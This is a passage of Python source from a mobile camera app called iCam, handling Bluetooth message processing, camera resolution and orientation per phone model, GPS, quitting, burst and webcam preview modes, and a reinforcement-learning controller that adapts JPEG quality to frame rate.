NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS) == \
NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS - 1:
hasDownloadedNewCmd = DownloadCommands()
counterBluetoothMessages += 1
elif uploadHowManyOfLatestBluetoothMessages > 0:
for howMany in range(uploadHowManyOfLatestBluetoothMessages):
if len(btMsgList) == 0:
return
# We send the most recent BT message received
BluetoothMessageProcessAndDelete(btMsgList[0],
deleteMessageIfInvalid)
if (counterBluetoothMessages %
NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS) == \
NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS - 1:
hasDownloadedNewCmd = DownloadCommands()
counterBluetoothMessages += 1
#!!!!TODO: if we want more media upload fairness (among the BT clients) we should not update btMsgList
btMsgList = GetBluetoothInboxMessageList()
if len(btMsgList) == 0:
return
return
"""
if uploadHowManyOfLatestBluetoothMessages >= len(btMsgList):
rangeBtMsgList = range(len(btMsgList))
else:
rangeBtMsgList = \
range(uploadHowManyOfLatestBluetoothMessages)
"""
else:
#rangeBtMsgList = []
pass
except:
DebugPrintErrorTrace()
dictBtMsgTime = {}
#def BluetoothMessageProcessTIM(timeBluetoothMessage, btMsgId):
def BluetoothMessageProcessTIM(btMsgId):
global dictBtMsgTime
try:
"""
DebugPrint("BluetoothMessageProcessTIM(timeBluetoothMessage=%d, " \
"btMsgId = %s" % (timeBluetoothMessage, str(btMsgId)))
"""
# timeBluetoothMessage = bluetoothInbox.time(btMsgId)
fileNameBtMsg = GetBluetoothMessageName(btMsgId)
DebugPrint("BluetoothMessageProcessTIM(): " \
"fileNameBtMsg = %s." % fileNameBtMsg)
"""
timeBluetoothMessage = bluetoothInbox.time(btMsgId)
DebugPrint("BluetoothMessageProcessTIM(): " \
"fileNameBtMsg = %s, timeBluetoothMessage = %s." % \
(fileNameBtMsg, str(timeBluetoothMessage)))
"""
"""
Apparently this crashes invariably iCam - sleep in a callback ain't
good on Symbian:
#SleepAndPetWatchdog(1.0)
"""
#fileNameBtMsg = GetBluetoothMessageName(btMsgId)
DebugPrint("BluetoothMessageProcessTIM(): fileNameBtMsg=%s" % \
fileNameBtMsg)
if False:
if not str.lower(fileNameBtMsg).endswith(BT_OBEX_EXTENSION_TIM):
return
if False:
timeUnixEraSent = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) : ]
timeUnixEraSent = timeUnixEraSent[ : -len(BT_OBEX_EXTENSION_TIM)]
timeUnixEraSent = timeUnixEraSent[0 : timeUnixEraSent.rfind("_")]
tokens = timeUnixEraSent.split("_")
timeTuple = (int(tokens[0]), int(tokens[1]), int(tokens[2]),
int(tokens[3]), int(tokens[4]), int(tokens[5]),
int(tokens[6]))
(tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec, \
numMilliseconds) = timeTuple
timeSentUE = time.mktime( (tm_year, tm_mon, tm_mday,
tm_hour, tm_min, tm_sec, -1, -1, -1) )
timeUnixEraSent = fileNameBtMsg[len(BT_OBEX_FILENAME_PREFIX) : ]
timeSentUE = int(timeUnixEraSent)
"""
We have:
- dictBtMsgTime[btMsgId] is the time the message was received on
this phone.
- timeSentUE is the time the message relays directly through its
fileNameBtMsg.
So instead of time timeSentUE we have dictBtMsgTime[btMsgId] and we
need to adjust.
"""
deltaTime = dictBtMsgTime[btMsgId] - timeSentUE
#ExecuteCommands("set-date-and-time %d" % int(timeUnixEraSent))
ExecuteCommands("set-date-and-time-delta %d" % int(deltaTime))
deltaTime = dictBtMsgTime[btMsgId] - timeSentUE
BluetoothDeleteMessage(btMsgId)
except:
DebugPrintErrorTrace()
def BluetoothMessageCallback(btMsgId):
"""
It seems this function (BluetoothMessageCallback) is not called on
Symbian^3 devices.
"""
global bluetoothInbox, dictBtMsgTime
crtTime = GetTime()
# This is used in BluetoothMessageProcessTIM():
dictBtMsgTime[btMsgId] = crtTime
if SYMBIAN_OS:
fileNameBtMsg = ""
btMsgArrivalTime = 0
"""
IMPORTANT: While in BluetoothMessageCallback(), we read INcorrect values
for fileNameBtMsg (emtpy string) and btMsgArrivalTime ().
"""
try:
"""
description(btMsgId) returns the name/title of the BT
message.
Note that, without a good particular reason, the name is empty
while in BluetoothMessageCallback().
"""
fileNameBtMsg = GetBluetoothMessageName(btMsgId)
"""
Get message time of arrival.
In BluetoothMessageCallback(), the value is
invariably 9.16120378515e+12 (it's float!) .
Note that all messages have here the same value for
btMsgArrivalTime, it seems, by looking at the logs:
btMsgArrivalTime = 9.16120378515e+12 .
So btMsgArrivalTime ~= 9.16 billion.
This is wrong if we interpret it as number of seconds from
the beginning of Unix era
(in 2013 Oct - time.time() returns ~1.3 billion).
So btMsgArrivalTime is not related to time.time().
From C:\Symbian\Carbide\workspace\pyinbox\src\inboxadapter.cpp
void CInboxAdapter::GetMessageTimeL(TMsvId aMessageId, TTime& aTime)
{
iMtm->SwitchCurrentEntryL(aMessageId);
iMtm->LoadMessageL();
aTime = (iMtm->Entry().Entry().iDate);
}
From C:\Symbian\Carbide\workspace\pyinbox\src\module.cpp:
/*
* Get message time of arrival.
*/
extern "C" PyObject *
inb_time(INB_object* self, PyObject *args)
{
TInt message_id = 0;
if (!PyArg_ParseTuple(args, "i", &message_id))
return NULL;
TTime arrival;
TRAPD(error, self->inbox->GetMessageTimeL((TMsvId)message_id, arrival));
if (error != KErrNone)
return SPyErr_SetFromSymbianOSErr(error);
return SPyUnixTime_FromSymbianUniversalTime(arrival);
}
{"time", (PyCFunction)inb_time, METH_VARARGS},
"""
btMsgArrivalTime = bluetoothInbox.time(btMsgId)
"""
We CANNOT get the BT message name at this time so we don't do any
processing.
"""
#MyThreadStart(BluetoothMessageProcessTIM, (crtTime, btMsgId))
except:
DebugPrintErrorTrace()
try:
DebugPrint("BluetoothMessageCallback(btMsgId=%s): crtTime = %d, " \
"fileNameBtMsg = %s, " \
"btMsgArrivalTime = %s." % \
(str(btMsgId), crtTime, fileNameBtMsg,
str(btMsgArrivalTime)))
if False:
if MY_DEBUG_STDOUT:
"""
The following instruction gives exception:
Traceback (most recent call last):
File "a.py", line 4147, in BluetoothMessageCallback
ValueError: timestamp out of range for platform time_t
"""
btMsgArrivalTimeStruct = time.localtime(btMsgArrivalTime)
print "BluetoothMessageCallback(): " + \
time.strftime("%Y_%m_%d_%H_%M_%S", \
btMsgArrivalTimeStruct)
except:
DebugPrintErrorTrace()
def BluetoothServerInitialize():
global bluetoothInbox, btMsgList
DebugPrint("Entered BluetoothServerInitialize().")
if SYMBIAN_OS:
try:
bluetoothInbox = pyinbox.Inbox(0x10009ED5)
bluetoothInbox.bind(BluetoothMessageCallback)
except:
DebugPrintErrorTrace()
"""
bind(callable)
Bind this instance to the device global inbox, callable function
as parameter (with one argument, the id of the message received).
Note that the new message received might not be of type SMS.
"""
"""
We choose not to put "or accessPointRetryConnect" because this
problem might be temporary - and get fixed in the following
moments, while iCam is still running.
"""
if accessPointName == u"":
#appuifw.note(u"Warning: BT server not connected to the " \
# "Internet.")
DebugPrint("Warning: BT server not connected to the Internet.")
DebugPrint("Exiting BluetoothServerInitialize().")
"""
try:
#e32.ao_sleep(2)
while True:
#while numClients == 0:
#time.sleep(1)
#thread.start_new_thread(BluetoothMessageListProcess,
# (bluetoothFD, ))
#bluetoothServerTimer.after(1,
# BluetoothMessageListProcessWrapper(bluetoothFD))
BluetoothMessageListProcess()
e32.ao_sleep(2)
except:
traceback.print_exc()
sys.stderr.flush()
sys.stdout.flush()
"""
"""
Talk(conn, None)
appuifw.note(u"Connection lost", "info")
conn.close()
"""
OPP_SERVICE_NAME_TO_SEARCH_FOR = "Object Push"
def BluetoothClientDiscoverServer(aBluetoothServerAddress=""):
global bluetoothServerAddress, bluetoothServerOPPServicePort
"""
Here we basically discover if there is a device with BT address
aBluetoothServerAddress and find out the port number
for the service with the name OPP_SERVICE_NAME_TO_SEARCH_FOR.
The port number bluetoothServerOPPServicePort is required by
btsocket.bt_obex_send_file().
"""
DebugPrint("Entered BluetoothClientDiscoverServer(" \
"aBluetoothServerAddress = %s) - " \
"bluetoothServerOPPServicePort = %s." % \
(aBluetoothServerAddress, str(bluetoothServerOPPServicePort)))
if SYMBIAN_OS:
if aBluetoothServerAddress != "":
bluetoothServerAddress = aBluetoothServerAddress
"""
Note that the BT server can send BT msgs to more than 1 client,
while the BT client can send BT msgs to only its server.
"""
if ((bluetoothMode == 2) and # The phone is a BT client
(len(bluetoothServerOPPServicePort.items()) > 0)) or \
(bluetoothServerAddress in bluetoothServerOPPServicePort):
DebugPrint("BluetoothClientDiscoverServer(): port already found " \
"--> bailing out")
return
try:
conn = btsocket.socket(btsocket.AF_BT, btsocket.SOCK_STREAM)
if bluetoothServerAddress == "":
# bluetoothServerAddress, services = btsocket.bt_discover()
(bluetoothServerAddress, bluetoothServerServices) = \
btsocket.bt_obex_discover()
else:
"""
We need to discover the services on our known target phone -
they can vary from instance to instance (i.e., service
"btchat" can be assigned to different ports in different
runs).
"""
(bluetoothServerAddress, bluetoothServerServices) = \
btsocket.bt_obex_discover(bluetoothServerAddress)
# bluetoothServerAddress, services = btsocket.bt_obex_discover()
DebugPrint("BluetoothClientDiscoverServer(): " \
"bluetoothServerAddress = %s, " \
"bluetoothServerServices = %s." % \
(bluetoothServerAddress, bluetoothServerServices))
#bluetoothServerOPPServicePort[bluetoothServerAddress] = -1
for serviceName in bluetoothServerServices:
if serviceName.find(OPP_SERVICE_NAME_TO_SEARCH_FOR) != -1:
"""
The port number is usually 9 on Nokia Symbian phones.
But we cannot take this for granted.
"""
bluetoothServerOPPServicePort[bluetoothServerAddress] = \
bluetoothServerServices[serviceName]
except:
#bluetoothServerOPPServicePort = -1
DebugPrintErrorTrace()
DebugPrint("BluetoothClientDiscoverServer(): " \
"bluetoothServerOPPServicePort = %s" % bluetoothServerOPPServicePort)
DebugPrint("Exiting BluetoothClientDiscoverServer().")
def BluetoothClientInitializeInbox():
global bluetoothInbox
if SYMBIAN_OS:
try:
bluetoothInbox = pyinbox.Inbox(0x10009ED5)
bluetoothInbox.bind(BluetoothMessageCallback)
except:
DebugPrintErrorTrace()
###############################################################################
###############################################################################
###############################################################################
###############################################################################
##########################End Bluetooth########################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
def SetUIOrientation(cameraId, isAfterImportCamera=True):
if SYMBIAN_OS:
global phoneModel
global orientationForThisPhoneModel
DebugPrint("Entered SetUIOrientation(cameraId = %d): " \
"orientationForThisPhoneModel = %s." % \
(cameraId, orientationForThisPhoneModel))
try:
"""
if isAfterImportCamera:
# Release the camera so other applications may use it
camera.release()
"""
if cameraId == 0:
"""
if orientationForThisPhoneModel == "landscape":
appuifw.app.orientation = "portrait"
e32.ao_sleep(2)
"""
appuifw.app.orientation = orientationForThisPhoneModel
elif cameraId == 1:
# appuifw.app.orientation = orientationForThisPhoneModel
# """
if SYMBIAN_3:
appuifw.app.orientation = orientationForThisPhoneModel
else:
"""
At least on S60 3rd edition, to view the viewfinder for
the VGA camera, we need to be in "portrait" mode.
In "landscape" mode we will see the image in the
viewfinder rotated.
"""
appuifw.app.orientation = "portrait"
# """
"""
From [Mobile_Python_2007]:
"The e32.ao_yield() at the end of the loop makes sure that the
system leaves some time to register the keyboard events,
as drawing in the tight loop consumes lots of CPU power
and might make the system unresponsive."
From PyS60 2.0 documentation:
Yields to the active scheduler to have ready active objects
with priority above normal scheduled for running. This
has the effect of flushing the eventual pending UI events.
Note that the UI callback code may be run in the context
of the thread that performs an ao_yield. For information
on active scheduler, see S60 SDK documentation [4].
"""
e32.ao_yield()
"""
if phoneModel in ["Nokia6120", "NokiaN95", "NokiaN82", "NokiaN8"]:
e32.ao_sleep(3)
"""
# e32.ao_sleep(3)
"""
if isAfterImportCamera:
# Reinitialize the camera to cope with the orientation change
#camera._my_camera = camera._camera.Camera(0)
camera.UseCamera(0)
"""
except:
DebugPrintErrorTrace()
def SetLocalPhotoResolution():
global localPhotoResolution
global localPhotoResolutionIndex, phoneModel, \
cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24
global numCamerasSupported
if ANDROID_OS:
localPhotoResolution = [(0, 0), (0, 0)]
elif SYMBIAN_OS:
"""
if localPhotoResolutionIndex[0] == 0:
if (phoneModel == "NokiaN95") or (phoneModel == "NokiaN82"):
# N95 and N82 report lowest resolution of (640,480), but
# actually require (320,240).
localPhotoResolution = [ cameraPhotoSizes_JPEG_Exif[0][
localPhotoResolutionIndex[0]], (320,240) ]
# To be able to capture (2592, 1944) photo, I need to specify
# (1600, 1200) and use JPEG_Exif... Also, N95 and N82 report
# lowest resolution of (640,480), but actually require
# (320,240).
#localPhotoResolution = [ (1600, 1200), (320, 240) ]
elif phoneModel == "Nokia6680":
localPhotoResolution = [ cameraPhotoSizes_JPEG_Exif[0][1],
cameraPhotoSizes_RGB24[1][localPhotoResolutionIndex[1]] ]
if MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD:
localPhotoResolution[0] = cameraPhotoSizes_JPEG_Exif[0][0]
elif phoneModel == "Nokia6120":
# For (1600, 1200) Main camera resolution it gives exception:
# "Size not supported for camera"
localPhotoResolution = [ (1152, 864), cameraPhotoSizes_RGB24[1][ \
localPhotoResolutionIndex[1]] ]
# To be able to capture (1600, 1200) photo, I need to specify
# (1152, 864) and use JPEG_Exif...
else:
#localPhotoResolution = [ cameraPhotoSizes_JPEG_Exif[ \
# localPhotoResolutionIndex[0]], \
# cameraPhotoSizes_RGB24[localPhotoResolutionIndex[1]] ]
localPhotoResolution = [ cameraPhotoSizes_JPEG_Exif[0][1],
cameraPhotoSizes_RGB24[1][localPhotoResolutionIndex[1]] ]
else:
# !!!!Implement well setting localPhotoResolution in case resolution
# specified by localPhotoResolutionIndex is not maximum
# supported, etc
if (phoneModel == "NokiaN95") or (phoneModel == "NokiaN82"):
# N95 and N82 report lowest resolution of (640,480), but actually
# require (320,240).
# localPhotoResolution = [ cameraPhotoSizes_JPEG_Exif[
# localPhotoResolutionIndex[0]], (320,240) ]
# To be able to capture (2592, 1944) photo, I need to specify
# (1600, 1200) and use JPEG_Exif... Also, N95 and N82 report
# lowest resolution of (640,480), but actually require
# (320,240).
localPhotoResolution = [ (1600, 1200), (320, 240) ]
elif phoneModel == "Nokia6680":
localPhotoResolution = [ cameraPhotoSizes_JPEG_Exif[0][1],
cameraPhotoSizes_RGB24[1][localPhotoResolutionIndex[1]] ]
if MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD:
localPhotoResolution[0] = cameraPhotoSizes_JPEG_Exif[0][0]
elif phoneModel == "Nokia6120":
# For (1600, 1200) Main camera resolution it gives exception:
# "Size not supported for camera"
localPhotoResolution = [ (1152, 864),
cameraPhotoSizes_RGB24[1][localPhotoResolutionIndex[1]] ]
# To be able to capture (1600, 1200) photo, I need to specify
# (1152, 864) and use JPEG_Exif...
else:
#localPhotoResolution = [ cameraPhotoSizes_JPEG_Exif[ \
# localPhotoResolutionIndex[0]], cameraPhotoSizes_RGB24[ \
# localPhotoResolutionIndex[1]] ]
localPhotoResolution = [ cameraPhotoSizes_JPEG_Exif[0][1],
cameraPhotoSizes_RGB24[1][localPhotoResolutionIndex[1]] ]
"""
try:
if numCamerasSupported == 1:
if phoneModel == "SamsungSGH-G810":
localPhotoResolution = \
[cameraPhotoSizes_RGB24[0][localPhotoResolutionIndex[0]],
(0, 0)]
else:
localPhotoResolution = \
[cameraPhotoSizes_JPEG_Exif[0][ \
localPhotoResolutionIndex[0]],
(0, 0)]
elif numCamerasSupported == 2:
localPhotoResolution = \
[cameraPhotoSizes_JPEG_Exif[0][ \
localPhotoResolutionIndex[0]],
cameraPhotoSizes_RGB24[1][localPhotoResolutionIndex[1]]]
if MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD:
localPhotoResolution[0] = \
cameraPhotoSizes_JPEG_Exif[0][0]
DebugPrint("SetLocalPhotoResolution(): " \
"localPhotoResolution = %s" % str(localPhotoResolution))
except:
DebugPrintErrorTrace()
elif SYMBIAN_UIQ_OS:
localPhotoResolution = [(0, 0), (0, 0)]
elif iOS_PYOBJC:
localPhotoResolution = [(0, 0), (0, 0)]
elif WINDOWS_OS:
localPhotoResolution = [(0, 0), (0, 0)]
elif WINDOWS_CE_OS_PYTHONCE:
localPhotoResolution = [(0, 0), (0, 0)]
def Help():
if SYMBIAN_OS:
oldBody = appuifw.app.body
try:
myTextEditor = appuifw.Text()
appuifw.app.body = myTextEditor
# See http://pys60.garage.maemo.org/doc/s60/node21.html
# It has only digit chars - letters are replaced by "square" char.
# myTextEditor.font = (u"Nokia Hindi S60", 12, None)
# "dense" # 'annotation','title','legend','symbol','dense','normal'
myTextEditor.font = "normal"
myTextEditor.add(u"Please visit http://go.to/slog/ to find out " \
"all info on how to use iCam.")
myTextEditor.add(u"Copyright Alex Susu.")
myTextEditor.add(u"\n")
e32.ao_sleep(5.0)
except:
DebugPrintErrorTrace()
appuifw.app.body = oldBody
def ConfirmQuit():
if SYMBIAN_OS:
try:
myAnswer = appuifw.query(u"Are you sure you want to exit?",
"query")
DebugPrint("ConfirmQuit(): myAnswer = %s" % str(myAnswer))
# If press Cancel, myAnswer is None
if myAnswer == True:
Quit()
except:
DebugPrintErrorTrace()
"""
*args is for the Android callback
See http://docs.python.org/release/2.5.2/ref/function.html :
"If the form ``*identifier'' is present, it is initialized to a tuple
receiving any excess positional parameters, defaulting to the empty
tuple. If the form ``**identifier'' is present, it is initialized to
a new dictionary receiving any excess keyword arguments, defaulting to
a new empty dictionary."
See also http://stackoverflow.com/questions/400739/what-does-mean-in-python .
"""
def Quit(*args):
global stdoutFile, stderrFile, deviceId
global appLock
#figleaf.stop()
#figleaf.write_coverage('.figleaf')
if ANDROID_OS:
try:
if MY_DEBUG_STDOUT:
stdoutFile.close()
if MY_DEBUG_STDERR:
stderrFile.close()
except:
DebugPrintErrorTrace()
"""
From http://docs.python.org/library/exceptions.html#exceptions.SystemExit
"This exception is raised by the sys.exit() function. When it is not
handled, the Python interpreter exits; no stack traceback is
printed."
"The os._exit() function can be used if it is absolutely positively
necessary to exit immediately (for example, in the child process
after a call to fork())"
"""
# This doesn't work well because I'm catching exceptions in the caller
# of Quit(), namely EventHandler().
#sys.exit()
global reactiveLoopIsStarted
reactiveLoopIsStarted = False
elif SYMBIAN_OS:
# See http://docs.python.org/library/os.html
# os._exit(0)
#myText = "Exiting iCam at %s - command given from the cellphone." \
# % GetCurrentDateTimeStringNice()
myText = "Exiting iCam at %s." % GetCurrentDateTimeStringNice()
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myText)
#if MY_DEBUG_STDOUT:
# stderrFile.print(myText)
# sys.stderr.flush()
try:
# Close the viewfinder, if any open.
camera.stop_finder()
# Release the camera so that other programs can use it.
camera.release()
except:
DebugPrint("Quit(): camera returned exception.")
DebugPrintErrorTrace()
# e32.ao_sleep(3)
SleepAndPetWatchdog(3.0, False)
try:
global sleepAndPetWatchdogTimer
sleepAndPetWatchdogTimer.cancel()
except:
# pass
DebugPrint("Quit(): sleepAndPetWatchdogTimer.cancel returned " \
"exception.")
DebugPrintErrorTrace()
appLock.signal()
# Set the UI orientation.
appuifw.app.orientation = "automatic" # "portrait"
"""
This has the effect of flushing the eventual pending UI events.
From [Mobile_Python_2007]: "The e32.ao_yield() at the end of the loop
makes sure that the system leaves some time to register the
keyboard events, as drawing in the tight loop consumes lots of CPU
power and might make the system unresponsive."
From PyS60 2.0 documentation: Yields to the active scheduler to have
ready active objects with priority above normal scheduled for
running. This has the effect of flushing the eventual pending UI
events. Note that the UI callback code may be run in the context
of the thread that performs an ao_yield. For information on active
scheduler, see S60 SDK documentation [4].
"""
e32.ao_yield()
# Requests a graceful exit from the application as soon as the current
# script execution returns.
appuifw.app.set_exit()
"""
try:
appuifw.app.set_exit()
except:
traceback.print_exc()
sys.stdout.flush()
sys.stderr.flush()
"""
# sys.exit()
try:
if MY_DEBUG_STDOUT:
"""
OLD: On Nokia 6680 we do not redirect the stdout to a file - it
would use too much space.
if deviceId != IMEI_6680:
stdoutFile.close()
"""
stdoutFile.close()
if MY_DEBUG_STDERR:
stderrFile.close()
except:
DebugPrintErrorTrace()
#figleaf.stop()
#figleaf.write_coverage('.figleaf')
elif iOS_PYOBJC:
try:
if MY_DEBUG_STDOUT:
stdoutFile.close()
if MY_DEBUG_STDERR:
stderrFile.close()
except:
DebugPrintErrorTrace()
"""
From http://docs.python.org/library/exceptions.html#exceptions.SystemExit
"This exception is raised by the sys.exit() function. When it is
not handled, the Python interpreter exits; no stack traceback is
printed."
"The os._exit() function can be used if it is absolutely positively
necessary to exit immediately (for example, in the child process
after a call to fork())"
# This doesn't work well because I'm catching exceptions in the caller
# of Quit(), namely EventHandler().
"""
# sys.exit()
# See http://docs.python.org/library/os.html
os._exit(0)
elif WINDOWS_CE_OS_PYTHONCE:
try:
if MY_DEBUG_STDOUT:
stdoutFile.close()
if MY_DEBUG_STDERR:
stderrFile.close()
except:
DebugPrintErrorTrace()
# See http://docs.python.org/library/os.html
os._exit(0)
def PlayAudioFile(pathFileName):
return
def StartGPS():
global readGPS
if SYMBIAN_OS:
try:
DebugPrint("StartGPS(): The available GPS modules: %s\n" % \
str(positioning.modules()) + \
"StartGPS(): The default GPS module Id: %s.\n" % \
str(positioning.default_module()) + \
"StartGPS(): Detailed info about the default module: %s." % \
str(positioning.module_info(positioning.default_module())))
"""
Select a module (in practice, selecting default module has no
relevance.).
"""
positioning.select_module(positioning.default_module())
"""
Set requestors: at least one requestor must be set before
requesting the current position or last position.
The last requestor must always be service requestor (whether or not
there are other requestors).
"""
positioning.set_requestors([{"type": "service",
"format": "application", "data": "test_app"}])
except:
DebugPrintErrorTrace()
try:
readGPS = 1 # True
print "StartGPS(): made readGPS = %d." % readGPS
sys.stdout.flush()
SetMenu()
StoreState()
except:
DebugPrintErrorTrace()
def StopGPS():
global readGPS
try:
readGPS = 0 # False
DebugPrint("StopGPS(): readGPS = %d." % readGPS)
SetMenu()
StoreState()
except:
DebugPrintErrorTrace()
def StartBurstMode():
global viewFinderSize, photoResolutionStr, burstModeIsStarted, prevVFFrame
if ANDROID_OS:
try:
DebugPrint("StartBurstMode(): calling cameraStartPreview()")
"""
Note: cameraStartPreview() starts the Viewfinder - at this moment
the UI submenu is no longer available.
"""
#!!!!TODO: On Samsung i5500 it gave exception: "com.googlecode.android_scripting.rpc.RpcError: Unknown RPC." (see Z:\1PhD\ReVival\Logs\Samsung_i5500\2014_01_01_2\stdout_2014_01_01_21_29_00.txt )
myDroid.cameraStartPreview(0, 80) #20)
"""
myDroid.cameraStartPreview(0, 80, LOCAL_FOLDER_MEDIA_FILES)
myDroid.cameraStartPreview(resolutionLevel=0,
jpegQuality=20, filepath=LOCAL_FOLDER_MEDIA_FILES)
"""
"""
This generates events like
Result(id=169, result=[{u'data': {u'format': u'jpeg', u'encoding': u'file', u'height': 288, u'width': 352, u'filename': u'/mnt/sdcard/external_sd/iCam/Media/prv-1287331584.jpg', u'quality': 80}, u'name': u'preview', u'time': 1377247976378000L}], error=None)
Here, the image binary data is not included
From http://www.mithril.com.au/android/doc/WebCamFacade.html:
"It will generate "preview" events as images become
available."
"If no file element is provided, the event will
include the image data as a base64 encoded string."
Event details
- The data element of the preview event will be a map,
with the following elements defined.
- format- currently always "jpeg"
- width- image width (in pixels)
- height- image height (in pixels)
- quality- JPEG quality. Number from 1-100
- filename- Name of file where image was saved.
Only relevant if filepath defined.
- error- included if there was an IOException saving
file, ie, disk full or path write protected.
- encoding- Data encoding. If filepath defined, will
be "file" otherwise "base64"
- data- Base64 encoded image data.
"""
#!!!!TODO: since cameraStartPreview() is not blocking (I think) we should not come back again here
#SleepAndPetWatchdog(120.0, False)
if False:
"""
This does NOT generate events NOR saves JPEG files -
just streams MPEG over the very small HTTP server.
"""
"""
webCamStart and webCamStop are used to start and stop
an Mpeg stream on a given port.
webcamAdjustQuality is used to ajust the quality of the
streaming video.
webcamStart Starts an MJPEG stream and returns a Tuple
of address and port for the stream.
resolutionLevel (Integer) increasing this number
provides higher resolution (default=0)
jpegQuality (Integer) a number from 0-100 (default=20)
port (Integer) If port is specified, the webcam service
will bind to port, otherwise it will pick any
available port. (default=0)
"""
#myDroid.webcamStart(resolutionLevel, jpegQuality, port)
#myDroid.webcamStart(0, 40, 8080)
myDroid.webcamStart(0, 60, 8080)
#myDroid.webcamStop()
except:
DebugPrintErrorTrace()
elif SYMBIAN_OS:
try:
DebugPrint("Entered StartBurstMode().")
burstModeIsStarted = True
# SetMenu()
# StoreState()
prevVFFrame = None
# In Burst (Turbo) mode we don't resize, since it's too time consuming.
viewFinderSize = photoResolutionStr[photoResolutionIndex][1]
if (cameraMode[0] == 2) and (cameraMode[1] == 0):
"""
It needs StartViewFinderForCamera("cameraId", isBackLightOn,
waitForVFFrames = False) because otherwise the VF is not
processing but 1-2 frames...
"""
StartViewFinderForCamera(0, True, False)
elif (cameraMode[0] == 0) and (cameraMode[1] == 2):
"""
It needs StartViewFinderForCamera("cameraId", isBackLightOn,
waitForVFFrames = False) because otherwise the VF is not
processing but 1-2 frames...
"""
StartViewFinderForCamera(1, True, False)
except:
DebugPrintErrorTrace()
def StopBurstMode():
global viewFinderSize, VIEWFINDER_SIZE_ORIG, burstModeIsStarted
DebugPrint("Entered StopBurstMode().")
try:
"""
camera.stop_finder()
StopViewFinderForCameraCallable(False)
"""
StopViewFinderForCameraCallable(True)
viewFinderSize = VIEWFINDER_SIZE_ORIG
burstModeIsStarted = False
except:
# SetMenu()
# StoreState()
DebugPrintErrorTrace()
if SYMBIAN_OS:
"""
We define the Keyboard class so we can detect keypresses and react
accordingly.
"""
class Keyboard(object):
def __init__(self, onevent=lambda : None):
self._keyboard_state = {}
self._downs = {}
self._onevent = onevent
def HandleEvent(self, myEvent):
if myEvent["type"] == appuifw.EEventKeyDown:
code = myEvent["scancode"]
if not self.IsDown(code):
self._downs[code] = self._downs.get(code, 0) + 1
self._keyboard_state[code] = 1
elif myEvent["type"] == appuifw.EEventKeyUp:
self._keyboard_state[myEvent["scancode"]] = 0
# SetMenu()
# StoreState()
self._onevent()
def IsDown(self, scancode):
return self._keyboard_state.get(scancode, 0)
def Pressed(self, scancode):
if self._downs.get(scancode, 0):
self._downs[scancode] -= 1
return True
return False
# viewFinderTimer = e32.Ao_timer()
# viewFinderTimerIsOn = False
startedReceivingFramesFromViewFinder = False
fillColorText = 0xFF0000
prevVFFrame = None
counterViewFinderCallback = 0
"""
On N82 (probably on N95 as well) if the viewfinder is started, but I give an
ao_sleep() it appears the Main camera shutter gets closed even if the
viewfinder is started.
"""
videoRecordFPS = 15
lastTimeAdapted = -1
numFramesLastTimeAdapted = 0
numFrames = 0
videoRecordStartTime = -1 # None
# videoRecordStartTime = GetTime()
videoRecordTime = 0
viewFinderStartTime = 0
avgFPS = 0.0
# posTimeForViewFinder should be adapted to viewFinderSize.
if SYMBIAN_OS:
if SYMBIAN_3:
posTimeForViewFinder = (118, 270)
else:
# posTimeForViewFinder = # (100, 230) #(200, 100)
posTimeForViewFinder = (65, 190)
try:
import RLearningController
RLearningControllerIsImported = True
class iCamMDP(RLearningController.MDP):
"""
def __init__(self):
pass
"""
instantFPS = -1
def SystemUpdate(self, actionScalar):
global numThreadsUpload, photoQuality
try:
"""
!!!!
Basically, crtState = actionScalar because our MDP state vars
are action vars also.
"""
self.crtState = self.GetFactoredVectorFromFlatId(actionScalar)
numThreadsUpload = 1 # 8
# numThreadsUpload = self.crtState[0] + 1
# photoQualityArray = [10, 25, 50, 75]
photoQuality = photoQualityArray[self.crtState[1]]
# For the moment, we have only 1 JPEG size.
#photoSize = self.crtState[2]
DebugPrint("SystemUpdate(actionScalar = %d): " \
"self.crtState = %s so have set " \
"numThreadsUpload = %d and photoQuality = %d." % \
(actionScalar, self.crtState,
numThreadsUpload, photoQuality))
except:
DebugPrintErrorTrace()
def GetCurrentReward(self):
return self.instantFPS
"""
MDP state vars and actions:
- num threads - 1..8
- quality JPEG - 10, 25, 50, 75% #, 90%
- size JPEG - 1 (maybe 2 or 4).
Note: the JPEG size is more difficult to adapt - either changing the VF
resolution or resizing the image are difficult operations.
Rewards:
- FPS (or FPS * quality)
Maybe I can use also:
- time (at least speculate periodicity in traffic load, maybe also
harvested energy: time of day, day of week).
- energy
- ...
"""
photoQualityArray = [10, 40, 70, 100]
mdp = iCamMDP(numStateVars=3, stateVarsCardinality=[1, 4, 1],
initState=[0, 1, 0])
#stateVarsCardinality = [8, 4, 1] #[8, 4, 4]
photoQuality = photoQualityArray[mdp.crtState[1]]
rLearningCtrl = RLearningController.RLearningController(mdp)
mdpEpoch = 0
except:
RLearningControllerIsImported = False
DebugPrint("Could not import RLearningController.")
DebugPrintErrorTrace()
def Adapt(deltaTime, deltaNumFrames):
global mdpEpoch
try:
# mdp.instantFPS = -1
# Probably not good: mdp.SystemUpdate(actionScalar = 0)
"""
mdp.crtState[0] = numThreadsUpload
mdp.crtState[1] = photoQuality
# For the moment, we have only 1 JPEG size.
mdp.crtState[2] = 0
"""
mdp.instantFPS = deltaNumFrames / deltaTime
# Read mdp.instantFPS, numThreadsUpload, photoQuality
mdpEpoch += 1
DebugPrint("Adapt(deltaTime = %.2f, deltaNumFrames = %d): At " \
"epoch %d (time %s), mdp.instantFPS = %.3f " \
"(numFrames = %d)." % \
(
deltaTime, deltaNumFrames,
mdpEpoch, GetCurrentDateTimeStringWithMilliseconds(),
mdp.instantFPS, numFrames
))
